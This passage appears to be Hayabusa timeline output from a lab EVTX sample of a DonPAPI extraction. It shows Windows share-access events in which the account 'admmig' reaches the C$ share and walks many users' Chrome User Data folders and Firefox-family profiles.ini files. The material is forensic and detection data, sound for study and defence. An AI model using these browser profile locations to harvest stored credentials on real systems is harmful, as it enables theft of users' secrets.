+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.830 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 
10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.851 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.932 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.968 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
